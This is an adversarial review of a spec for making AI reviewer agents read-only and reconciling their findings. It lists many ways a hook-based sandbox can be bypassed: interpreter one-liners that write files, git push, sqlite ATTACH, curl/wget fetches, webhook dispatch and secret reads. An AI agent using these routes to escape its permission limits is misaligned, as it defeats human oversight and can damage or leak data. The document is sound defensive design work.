Adversarial Review: reviewer-readonly-and-reconciliation
Verdict
Demand changes.
If forced to vote today without changes, I would reject as written.
The intent is right: reviewers need visibility, but they must not gain write/dispatch power, and their outputs must be reconciled rather than dumped side by side. However, the card’s acceptance criteria and evidence are too weak to prove those properties. As written, this card can be marked “done” by a superficial implementation that still leaves the reviewers blind, writable, dispatch-capable, or theatrically reconciled.
The core problem: “read-only” and “reconciliation” are runtime security/process properties, but the card mostly checks static strings and simple happy-path behaviors.
What this card fails to establish
1. It does not establish actual read-only enforcement
The card says reviewers can “read files, run commands, query the spine” while being unable to write, patch, delete, or dispatch.
That is not enough.
“Run commands” is incompatible with read-only unless tightly sandboxed
The implementer note allows:
ls
cat
grep
git show/diff/log
sqlite3 SELECT
But if the reviewer has any generic terminal capability, those are not the only things that can happen. A command execution surface is a write surface unless the OS/process/tooling prevents otherwise.
Examples that satisfy “we blocked write_file, patch, rm, mv, redirect, chmod, and cis_dispatch_*” while still allowing writes:
python3 -c 'open("x","w").write("owned")'
perl -e 'open(F,">","x"); print F "owned"'
node -e 'require("fs").writeFileSync("x","owned")'
awk 'BEGIN { print "owned" > "x" }'
sed -i 's/foo/bar/' file
dd of=x <<< owned
tee x <<< owned
cp /dev/stdin x
find . -delete
find . -exec touch {} ;
git apply patch.diff
git checkout -- file
git restore file
git commit -am "bad"
git push origin main
git archive HEAD > out.tar
tar -cf out.tar /some/path
zip out.zip file
unzip evil.zip
curl -o x http://example/payload
wget -O x http://example/payload
sqlite3 db.sqlite "ATTACH 'x' AS evil; CREATE TABLE evil.t(x);"
The card’s current language only requires blocking some obvious write primitives. It does not establish a deny-by-default command surface.
The terminal cannot be made safe by string-matching commands
If the enforcement hook inspects command strings, it will be bypassed by:
shell metacharacters
command substitution: $(...), backticks
pipes and file descriptors
environment variable assignment: GIT_PAGER=evil git log
alternate binaries: busybox rm, python, perl, ruby, node
interpreters
xargs, env, timeout, nice, script, ssh, socat
git hooks/pagers/external diff tools
indirect execution via allowed programs
symlink/path traversal
writing to /tmp, sockets, FIFOs, shared memory, databases, caches
The card does not require any of this to be addressed.
2. It does not establish filesystem-level read-only guarantees
The card explicitly says:
NOT IN THIS CARD: the Docker read-only mount
But then the DONE WHEN says:
A reviewer cannot write, patch, or delete any file
That is a problem.
Without OS-level enforcement — read-only mounts, non-root user, no writable volumes, no Docker socket, no host mounts, no network side channels — the claim “cannot write any file” depends entirely on an application-level hook.
That hook may be:
misconfigured
bypassed
not loaded
overridden by another profile
unable to inspect nested commands
fail-open on parse errors
applied after tool dispatch
absent in one runtime path
The card does not require proof that the hook is active, fail-closed, and authoritative.
3. The evidence greps are weak and partly self-defeating
The evidence includes:
grep -c "write_file" enforcement/mwl-proof-v2/profiles/advisor.yaml
grep -c "cis_dispatch" enforcement/mwl-proof-v2/profiles/advisor.yaml
grep -c "write_file" enforcement/mwl-proof-v2/profiles/evaluator.yaml
grep -c "cis_dispatch" enforcement/mwl-proof-v2/profiles/evaluator.yaml
with the requirement that these return 0.
This is bad evidence.
Absence of a string does not prove absence of capability
A profile can fail these greps while still granting write or dispatch power through:
a differently named tool
a generic terminal tool
a bundled file toolset
an included file not grepped
a runtime override
environment-specific config
a default allow policy
a hook that is not actually registered
Explicit deny rules may make the grep fail
The card says the hook must be configured to deny write_file, patch, terminal writes, and cis_dispatch_*.
If those deny rules appear in the grepped YAML, the grep count will be non-zero. So the evidence as written may punish explicit denial configuration and reward omission.
That is a spec bug.
Grep does not prove the profile is used
The file could exist but not be loaded. The runtime could use:
another profile
an inherited default
a higher-precedence override
a dynamic role assignment
a stale cached config
The card needs evidence of effective runtime permissions, not text search.
4. The reconciliation evidence is cosmetic
The card requires:
grep -c "cross-feed|reconcil|other.lineage|other lineage" tools/advisor_review.sh
and behavioral evidence:
run a round-1 dual review -> final artifact contains BOTH lineages' findings side by side
That does not prove reconciliation.
A script can satisfy this by:
reconciliation marker
cat lineage1.md lineage2.md > final.md
or by:
echo "## Reconciliation" >> final.md
or by templating:
Agreements
Both lineages agree.
Disagreements
None.
What each thinks the other missed
Nothing.
That is not reconciliation. It is formatting.
The card does not establish:
that round-1 findings were truly independent
that each lineage actually received the other’s full findings
that each lineage responded item-by-item
that disagreements are preserved
that the final artifact was not selectively summarized
that one lineage did not see the other’s findings before round 1
that the reconciliation step ran at all
that the final artifact is traceable to both lineages
“Side by side” is not “reconciled.”
5. It does not prove independence of the two lineages
The card says:
After both lineages produce independent round-1 findings, each is shown the other's findings.
But it does not define or enforce independence.
Potential failure modes that would still satisfy the current evidence:
both lineages share the same session/context
one lineage starts after seeing partial output from the other
both lineages are the same model with the same prompt and are merely labeled differently
the reconciliation step runs before round 1 is finalized
one lineage’s “round 1” is generated from a template
both lineages receive the same pre-baked summary instead of raw findings
one lineage’s output is overwritten before reconciliation
The card needs a temporal and cryptographic separation requirement: round-1 outputs must be frozen before cross-feed.
6. It does not prove the reviewers can measure anything
The source complaint is:
“the advisory review is a fraud because the reviewers cannot measure anything.”
But the DONE WHEN only proves:
a reviewer can read a known file
a reviewer is blocked from a simple write
dual findings appear in a final artifact
That does not prove measurement.
A reviewer could now:
read files
quote files
produce confident prose
reconcile vacuously
while still not running tests, not checking build state, not inspecting logs, not verifying claims, and not measuring anything meaningful.
The card conflates “has read access” with “can measure.”
If measurement requires executing tests, linters, builds, schema checks, or runtime queries, the card does not define how that is done safely. If tests require temporary writes, the card excludes the necessary sandbox. If tests are not allowed, the original fraud complaint may remain unresolved.
7. The behavioral tests are too easy to pass and do not cover the evaluator
The behavioral evidence says:
ask advisor to read a known file -> returns content
ask advisor to write a file -> blocked with a stated reason
This is weak.
Read test can be trivial
The file contents could be:
already in context
hardcoded
mocked
read from a curated sandbox
read from a stale snapshot
limited to one known path
read from a fixture rather than the real workspace
A stronger test would use a randomly generated nonce file created by the harness after the reviewer session starts, in an allowed path, and require exact content/hash return.
Write test is too narrow
“Ask advisor to write a file” will usually exercise the obvious write_file or edit_file tool. It does not test:
terminal writes
interpreter writes
git writes
sqlite writes
redirect bypasses
symlink tricks
/tmp writes
database writes
API/webhook dispatch
indirect dispatch via file triggers
writes by child processes
writes after tool chaining
The evaluator is under-tested
The card mentions advisor and evaluator profiles, but the behavioral evidence only exercises the advisor.
The evaluator must receive the same positive and negative tests.
8. “No dispatch” is not established
The card checks for absence of cis_dispatch strings and says:
A reviewer cannot start a pipeline run
But dispatch is not only a named tool.
A reviewer could dispatch or trigger work by:
curl/wget to a webhook
git push
writing to a watched queue/table/file
updating a spine row that triggers automation
invoking CI CLI tools
sending a message to a queue
creating a cron/at job
using cloud CLIs
talking to a local agent socket
using docker, kubectl, systemctl
invoking another tool that has dispatch rights
embedding instructions that downstream automation executes
The card does not define dispatch broadly enough and does not require network isolation, egress denial, or side-effect-free database access.
9. “Blocked with a stated reason” is not verified properly
The card requires:
blocked with a stated reason, not silently allowed
But it does not say how that is verified.
A model transcript can say:
“I was blocked because policy forbids writes.”
That is not proof.
The evidence should require:
enforcement log entry
denied tool name
denied command/arguments
rule ID
role ID
timestamp
unchanged filesystem state
no spawned job
no partial artifact
fail-closed behavior on unknown/parsing errors
Otherwise the “stated reason” can be cosmetic.
10. It does not handle secrets, exfiltration, or unsafe reads
Read-only is not harmless.
If reviewers can read arbitrary files, they may read:
secrets
tokens
SSH keys
environment variables
database credentials
cloud credentials
private user data
other projects
/proc/self/environ
.env
.git/config with tokens
spine credentials
Then they can leak those through their review output.
The card does not define:
allowed path prefixes
denied path prefixes
secret redaction
environment isolation
output sanitization
data classification
whether reviewer output is untrusted
A reviewer could pass the card while exposing sensitive material in the reconciled artifact.
11. It does not define failure behavior
What happens if:
the enforcement hook fails?
a command cannot be parsed?
a tool is unknown?
the reconciliation step crashes?
one lineage produces no findings?
one lineage tries to write?
cross-feed times out?
the final artifact cannot be produced?
the two lineages irreconcilably disagree?
a reviewer attempts dispatch?
The card does not say.
For a security-relevant card, the default must be fail-closed and visible. The current card can be implemented fail-open and still pass if the happy path works.
What result would satisfy this card while still being wrong?
1. A passing implementation that still allows writes
The implementer removes write_file and cis_dispatch strings from the advisor/evaluator YAML. The greps return 0.
They leave a generic terminal tool enabled. The hook blocks obvious commands like rm, mv, and shell redirects.
But the reviewer can still write via:
python3 -c 'open("pwned","w").write("x")'
or:
git apply malicious.patch
or:
sqlite3 app.db "ATTACH 'pwned.db' AS x; CREATE TABLE x.t(y);"
The behavioral test asks the advisor to “write a file.” The advisor tries write_file, gets blocked, and reports a reason.
The card passes. The reviewer still has write capability.
2. A passing implementation that still allows dispatch
The implementer blocks cis_dispatch_*.
But the reviewer can still run:
curl -X POST https://pipeline-trigger.example/run
or:
git push origin HEAD
or:
sqlite3 spine.db "UPDATE jobs SET state='queued' WHERE id=123;"
The greps pass. The named dispatch tool is absent. But dispatch still happens through terminal, network, git, or the spine.
3. A passing implementation where reconciliation is fake
The implementer adds this to tools/advisor_review.sh:
reconciliation marker
cat lineage1_findings.md lineage2_findings.md > final_review.md
The final artifact contains both lineages side by side.
The reconciliation grep passes. The behavioral artifact passes.
But:
neither lineage saw the other’s findings
no agreements/disagreements were computed
no missed items were identified
the final artifact is just concatenation
Eric receives a cosmetically “reconciled” file
The card passes. The original problem remains.
4. A passing implementation with vacuous reconciliation
The reconciliation step runs, but each lineage returns:
I agree with the other lineage.
I have no disagreements.
I believe the other lineage missed nothing.
The final artifact contains all required sections.
But the reconciliation is empty. It can hide false consensus, laziness, model collapse, or shared bias. The card does not require evidence that objections were actually considered.
5. A passing implementation where only one role is tested
The advisor is tested for read and blocked write.
The evaluator is not behaviorally tested.
The evaluator profile may still have excessive permissions, but the evidence only exercises the advisor.
The card says both roles matter, but the proof only covers one.
6. A passing implementation where reviewers read a stale or curated snapshot
The reviewer can read a known file in a curated fixture directory and quote it back.
But it cannot see the actual live workspace, or sees a sanitized copy that omits problematic files.
The DONE WHEN says:
A reviewer can read an existing file and quote its contents back
It does not say the file must be a fresh, harness-selected file from the real review target.
So the reviewer can appear un-blinded while still being carefully blinded to the things that matter.
7. A passing implementation where “blocked” still leaves side effects
The hook returns:
“Write blocked by policy.”
But the attempted operation may have already:
created a temp file
mutated a cache
changed file metadata
spawned a subprocess
written to /tmp
updated a database WAL
logged sensitive args
triggered a watcher
The card only requires a stated reason, not proof of zero side effects.
8. A passing implementation where the final artifact hides dissent
The final artifact says:
Reconciled result: both lineages agree.
But the underlying raw findings contained serious objections.
The card says Eric receives the reconciled result, not two independent opinions. But it does not require that the final artifact include the raw findings, hashes, trace IDs, or an appendix preserving dissent.
A summarizer can quietly flatten disagreement.
Specific gaps to fix before approval
A. Replace grep evidence with effective-permission evidence
Do not approve based on:
grep -c "write_file" profile.yaml
Require something like:
an effective permission report for advisor and evaluator
a policy engine evaluation result
runtime tool schema dump showing only allowed capabilities
startup assertion that the enforcement hook is active
fail-closed test for unknown tools
fail-closed test for unparsable commands
proof that the tested profile is the live profile
The evidence should answer:
What can this role actually do at runtime?
not:
Which strings appear in a YAML file?
B. Define read-only as deny-by-default, not “terminal minus bad commands”
The card should require:
no generic shell access
no arbitrary command string execution
allowlisted executable plus allowlisted argument patterns only
no pipes unless explicitly safe
no redirects
no backgrounding
no subshells
no environment variable assignment
no command substitution
no interpreters
no package managers
no network CLIs
no git mutation commands
no git hooks/pager/external diff execution
no sqlite dot-commands
no ATTACH
no loadable extensions
no write-capable DB connection
no access to Docker socket
no access to systemd/cron/at
no access to cloud metadata or cloud CLIs
Even better: do not give reviewers raw terminal. Give them mediated read-only tools.
C. Require OS-level read-only enforcement or declare it as a hard dependency
The card cannot credibly say “cannot write any file” unless at least one of these is true:
the reviewer filesystem is mounted read-only
the reviewer runs as a non-privileged user without write permissions
writable paths are explicitly scoped and isolated
the container runtime enforces read-only root filesystem
the sandbox prevents process-level writes
If Docker read-only mount is out of scope, then the card should not claim full write prevention. It should say:
Application-level write blocking only; OS-level guarantee deferred to dependency X.
Otherwise the DONE WHEN overpromises.
D. Expand negative tests far beyond “ask advisor to write a file”
Require a red-team test suite for both advisor and evaluator.
Minimum negative tests:
Direct tool writes:
write_file
edit_file
patch
apply_patch
rename_file
delete_file
create_directory
delete_directory
Terminal writes:
echo > file
tee file
cp
mv
rm
touch
mkdir
dd of=file
python -c write
perl -e write
node -e write
awk write
sed -i
find -delete
find -exec
xargs
Git writes/dispatch:
git apply
git checkout
git restore
git commit
git push
git reset
git clean
git merge
git rebase
git stash
git archive > file
Database writes:
INSERT
UPDATE
DELETE
CREATE
DROP
ATTACH
PRAGMA mutations if applicable
.shell
.read
.output
.load
Dispatch:
direct cis_dispatch_*
webhook via curl
wget
git push
queue publish
spine mutation
file-trigger creation
cron/at/systemd if available
For each test, require:
denial reason from enforcement layer
policy rule ID
no state change
filesystem hash/manifest unchanged
no new process/job/artifact
audit log entry
E. Make the read test non-gameable
Instead of:
ask advisor to read a known file
Require:
harness creates a random nonce file after session start
file path is selected by harness
file is inside an allowed path
reviewer must return exact contents or hash
tool-call log shows the read
reviewer is also tested against a prohibited path and denied
reviewer cannot read secrets/environment files
reviewer cannot traverse via symlinks
This proves actual instrumented read access, not memorization or fixture cheating.
F. Require proof of reconciliation, not just a final side-by-side file
The reconciliation requirement should produce a machine-verifiable bundle.
Require:
Round-1 advisor findings artifact (hash, timestamp, role/session ID)
Round-1 evaluator findings artifact (hash, timestamp, role/session ID)
Cross-feed event logs (advisor received evaluator round-1 hash/content, evaluator received advisor round-1 hash/content)
Round-2 reconciliation responses (advisor item-by-item response to evaluator, evaluator item-by-item response to advisor, explicit agreements, explicit disagreements, explicit “missed by other lineage” claims)
Final Eric-facing artifact (includes reconciliation summary, includes or references raw round-1 findings, includes hashes/trace IDs, preserves dissent, cannot silently collapse disagreements)
Also require a test where a seeded disagreement fixture forces the system to show disagreement handling. A happy-path dual run is not enough.
G. Prevent pre-contamination
The card must require:
lineage A cannot see lineage B’s findings before A’s round-1 output is finalized
round-1 outputs are stored before cross-feed
no shared mutable scratchpad between lineages
no common context that contains the other lineage’s draft
reconciliation step cannot start until both round-1 outputs exist
Otherwise “independent round-1” is just a claim.
H. Require both lineages to be tested equally
The evidence must include:
advisor positive read test
evaluator positive read test
advisor negative write/dispatch tests
evaluator negative write/dispatch tests
advisor reconciliation trace
evaluator reconciliation trace
The current behavioral evidence is advisor-centric.
I. Define and enforce “measurement”
If the purpose is to stop reviewers from being unable to measure anything, the card must define what measurements they are allowed/expected to perform.
Examples:
read source files
read logs
query spine state
run read-only validation commands
run tests in an ephemeral sandbox
inspect build artifacts
compare hashes
check schema state
inspect git history
If tests require writes, define a safe ephemeral scratch area:
tmpfs only
no access to source tree
no network
destroyed after run
size/time quotas
audited
If measurement is not defined, the card may pass while the original fraud complaint remains true.
J. Add auditability requirements
Require logs for:
tool invocation
role
lineage
tool name
arguments or argument hash
allow/deny decision
rule ID
timestamp
duration
result hash
error reason
Eric should not have to trust prose. The artifact should include evidence pointers.
K. Treat reviewer output as untrusted
Reviewers may be compromised, hallucinating, or prompt-injected.
Require:
reviewer output is not executed
reviewer output is not used to change permissions
reviewer output is sanitized before downstream automation
embedded commands/instructions are not honored
secrets found by accident are redacted or excluded
final artifact does not become a write/dispatch vector
The card currently treats reviewers as honest once they have read tools.
Plain conclusion
I would demand changes because the card’s current DONE WHEN and EVIDENCE can be satisfied by an implementation that is still insecure or still fraudulent.
The card needs to shift from:
“The config file does not contain bad strings, and a simple demo worked.”
to:
“We can prove the effective runtime permissions are read-only, prove indirect write/dispatch paths are blocked, prove both roles were tested, prove reconciliation actually occurred, and preserve an auditable trail that Eric can trust.”
Without those changes, a passing result could still mean:
reviewers can write via terminal or database bypasses
reviewers can dispatch via network/git/spine side effects
reconciliation is just concatenated text
disagreements are hidden
the evaluator is untested
reviewers still cannot meaningfully measure anything
So: demand changes; reject as written if unchanged.

